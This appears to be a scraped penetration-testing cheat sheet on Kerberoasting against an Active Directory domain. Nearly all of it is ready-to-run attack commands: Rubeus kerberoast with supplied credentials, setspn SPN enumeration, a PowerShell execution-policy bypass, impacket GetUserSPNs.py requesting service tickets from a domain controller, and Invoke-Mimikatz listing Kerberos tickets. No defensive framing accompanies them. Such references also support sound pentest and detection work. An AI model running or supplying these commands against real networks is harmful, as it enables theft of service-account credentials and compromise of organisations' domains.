Kerberoasting
Rubeus
.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrapGetting SPNs
setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:[email protected] -dc-ip 10.10.10.21Mimikatz
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"Extracting tickets
Invoke-Kerberoast
Last updated